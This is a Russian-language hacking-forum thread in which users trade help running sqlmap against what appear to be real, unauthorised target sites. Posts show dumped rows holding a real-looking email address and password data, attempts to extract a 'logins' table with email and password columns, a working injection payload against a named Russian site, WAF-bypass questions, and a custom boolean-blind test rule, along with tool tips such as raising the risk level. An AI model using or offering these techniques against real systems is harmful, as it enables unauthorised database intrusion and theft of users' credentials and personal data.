Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    54
    Likes Received:
    5
    Reputations:
    0
    скуля в юнион

    мускул(MariaDB fork)

    проблема с кодировкой password (blob)

    вид:| Linkinsgirl69@yahoo.com | G/\x12\\?ЦУ?дЬЧП?XP_ | 2 |

    попробывал выводить с --binary-fields=password , c --hex , вид не меняется .

    Есть ли способы вытащить пароль в нормальном виде?
     
  2. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,033
    Likes Received:
    1,427
    Reputations:
    53
    C чего взял что blob?
     
  3. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    54
    Likes Received:
    5
    Reputations:
    0
  4. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,033
    Likes Received:
    1,427
    Reputations:
    53
    хм... случайно не так --common-column. Даже не знаю что можно сделать, если только в аски вытаскивать,дальше декодировать...
     
  5. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    54
    Likes Received:
    5
    Reputations:
    0

    не понял причем тут комон-колум , но ладно ) хз что с этим делать , первый раз такое вижу
     
  6. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,033
    Likes Received:
    1,427
    Reputations:
    53
    когда я я брутил колонки так --common-column У меня подобная фигня была..
     
  7. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    54
    Likes Received:
    5
    Reputations:
    0
    Нет колонки и вся прочая инфа збс выводится . судя по всему это никак не победить )
     
  8. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,033
    Likes Received:
    1,427
    Reputations:
    53
    В лс кинь,может придумаемм что-то
     
  9. RedHazard

    RedHazard Member

    Joined:
    17 Apr 2011
    Messages:
    48
    Likes Received:
    5
    Reputations:
    1
    Помогите крутануть
    [21:12:05] [INFO] Host parameter 'Host' appears to be 'MySQL OR time-based blind (ELT - comment)' injectable

    [21:36:03] [INFO] heuristic (XSS) test shows that GET parameter 'call' might be vulnerable to cross-site scripting (XSS) attacks

     
  10. exT1ma4ka

    exT1ma4ka New Member

    Joined:
    12 May 2010
    Messages:
    44
    Likes Received:
    2
    Reputations:
    5
    доброго времени суток.

    знаем, что в параметре blind-inj: при AND 1=1 - выводит Access Denied, при AND 1=0 - обычная страница. sqlmap не видит её, лишь что ему access denied выдают. как ему намекнуть что это верный возврат?

    WAF: KONA Security Solutions (Akamai Technologies)

    --
    ответ: --code=403
    --
    что не помогло в случае с данной WAF
     
    #910 exT1ma4ka, 10 Apr 2019
    Last edited: 10 Apr 2019
  11. ruvtshow

    ruvtshow New Member

    Joined:
    27 Apr 2019
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Помогите разобраться, постоянно прости токен при запуске, конкретно по этой ссылке, при этом через Sqli Dumper. база сливается спокойно, но криво.
    https://paste.pics/5EOE3
    Как с этим бороться?

    GET parameter 'carttoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests?

    и чтобы не выбрал по итогу:

    [13:42:18] [INFO] testing connection to the target URL
    [13:42:25] [INFO] heuristics detected web page charset 'ISO-8859-2'
    [13:42:25] [INFO] testing if the target URL content is stable
    [13:42:32] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
    how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] с
    [13:42:43] [INFO] ignoring GET parameter 'carttoken'
    [13:42:43] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

    [*] ending @ 13:42:43 /2019-04-27/

    'action' is not recognized as an internal or external command,
    operable program or batch file.
    'ItemID' is not recognized as an internal or external command,
    operable program or batch file.
    'category' is not recognized as an internal or external command,
    operable program or batch file.
    'viewby' is not recognized as an internal or external command,
    operable program or batch file.
    'sortorder' is not recognized as an internal or external command,
    operable program or batch file.
    исход всегда один и тот же.

    Просто я понять не могу, везде про csrf и anti-csrf пишут и показывают, речь идет о входа куда либо (username:password)
    А это обычная страница с описанием товара. токен она отсылает, а где взять anti-csrf - ума не приложу.
     
    #911 ruvtshow, 27 Apr 2019
    Last edited: 27 Apr 2019
  12. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,033
    Likes Received:
    1,427
    Reputations:
    53
    Что-то не понятное ты в водишь
     
  13. ruvtshow

    ruvtshow New Member

    Joined:
    27 Apr 2019
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Да, так и естьб поменял параметр на другой, и все стало впорядке, теперь возникла другая проблема.
    При попытке дампа нужных мне строк, выдает вот такое:
    [WARNING] unable to retrieve the entries of columns 'EmailAddress, Password, Permissions, Username' for table 'logins' in database 'БЛАБЛАБЛА' (permission denied)
    [22:36:01] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 1 times
    [22:36:01] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
    Как это обойти?
     
  14. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,033
    Likes Received:
    1,427
    Reputations:
    53
    Соединение рвётся, или ещё что-то waf как показывает лог
     
  15. ruvtshow

    ruvtshow New Member

    Joined:
    27 Apr 2019
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Вот все, что выдает
    </td>
    </tr>

    <tr>
    <td class="struct">RAW_TRACE</td>
    <td>
    at cfindex2ecfm1932376464.runPage(C:\home\БЛАБЛАБЛА\wwwroot\index.cfm:86)
    </td>
    </tr>

    <tr>
    <td class="struct">TEMPLATE</td>
    <td>
    C:\home\БЛАБЛАБЛА\wwwroot\index.cfm
    </td>
    </tr>

    <tr>
    <td class="struct">TYPE</td>
    <td>
    CFML
    </td>
    </tr>

    </table>
    </td></tr>
    </table>
    </td>
    </tr>



    <tr>
    <th>Token:</th>
    <td>0</td>
    </table>




    [00:07:59] [WARNING] unable to retrieve the entries of columns 'EmailAddress' for table 'logins' in database 'БЛАБЛАБЛА' (permission denied)
    [00:07:59] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 2 times
    [00:07:59] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
     
  16. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
  17. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,033
    Likes Received:
    1,427
    Reputations:
    53
    sqlmap -u "http://www.site/forum/topic/16369/vilket-ar-sexigast-att-spruta-inuti-eller-pa*/page/ " --dbs
     
    vladF likes this.
  18. kcash

    kcash New Member

    Joined:
    6 Apr 2009
    Messages:
    81
    Likes Received:
    0
    Reputations:
    0
    Как уработать ресурс до конца?


    [*] starting at 06:41:49
    [06:41:49] [INFO] parsing HTTP request from 'r.txt'
    custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
    [06:41:51] [INFO] resuming back-end DBMS 'microsoft access'
    [06:41:51] [INFO] testing connection to the target URL
    [06:41:53] [INFO] heuristics detected web page charset 'windows-1251'
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.bok-o-bok.ru:80/filmoteka.asp?film=412 AND 9579=9579&lan=2
    ---
    [06:41:53] [INFO] the back-end DBMS is Microsoft Access
    web server operating system: Windows 2008 R2 or 7
    web application technology: ASP.NET, Microsoft IIS 7.5, ASP
    back-end DBMS: Microsoft Access
    [06:41:53] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
    [06:41:53] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
    [06:41:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [06:41:53] [INFO] retrieved:
    you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to me
    rge them in further requests? [Y/n] y
    [06:41:56] [INFO] heuristics detected web page charset 'ascii'
    [06:41:56] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
    [06:41:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
    [06:41:56] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
    [06:41:56] [ERROR] cannot retrieve table names, back-end DBMS is Access
    do you want to use common table existence check? [Y/n/q] y
    which common tables (wordlist) file do you want to use?
    [1] default 'C:\Python27\sqlmap\txt\common-tables.txt' (press Enter)
    [2] custom
    > 1
    [06:42:03] [INFO] checking table existence using items from 'C:\Python27\sqlmap\txt\common-tables.txt'
    [06:42:03] [INFO] adding words used on web page to the check list
    please enter number of threads? [Enter for 1 (current)] 4
    [06:42:13] [INFO] starting 4 threads
    [06:45:57] [WARNING] no table(s) found
    No tables found
    [06:45:57] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 3143 times
     
  19. aparsera

    aparsera New Member

    Joined:
    19 Jun 2018
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Есть boolean based такого формата x.php?q=1' OR 1=1 OR 'bla'='bla

    Но мап ее не видит, подозреваю из-за OR OR
    Думаю, что надо подправить boolean_blind.xml, верно? кто может помочь правильно составить правило?

    upd

    изменил, теперь видит иньекцию, но говорит что false-positive, как это исправить?

    <test>
    <title>OR boolean-based blind - WHERE or HAVING clause</title>
    <stype>1</stype>
    <level>1</level>
    <risk>1</risk>
    <clause>1,9</clause>
    <where>2</where>
    <vector>OR [INFERENCE]</vector>
    <request>
    <payload>%27OR 1=1 OR %273%27=%273</payload>
    </request>
    <response>
    <comparison>%27OR 1=2 OR %273%27=%273</comparison>
    </response>
    </test>


    [03:55:45] [INFO] GET parameter 'q' appears to be 'OR boolean-based blind - WHER
    E or HAVING clause' injectable
    [03:55:51] [INFO] automatically extending ranges for UNION query injection techn
    ique tests as there is at least one other (potential) technique found
    [03:56:05] [WARNING] in OR boolean-based injection cases, please consider usage
    of switch '--drop-set-cookie' if you experience any problems during data retriev
    al
    [03:56:05] [INFO] checking if the injection point on GET parameter 'q' is a fals
    e positive
    [03:56:05] [WARNING] false positive or unexploitable injection point detected
    [03:56:05] [WARNING] GET parameter 'q' does not seem to be injectable
     
    #919 aparsera, 31 May 2019
    Last edited: 31 May 2019
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,463
    Likes Received:
    778
    Reputations:
    834
    чтоб sqlmap видел вектор через OR нужно указать --risk=3
     
    _________________________
Loading...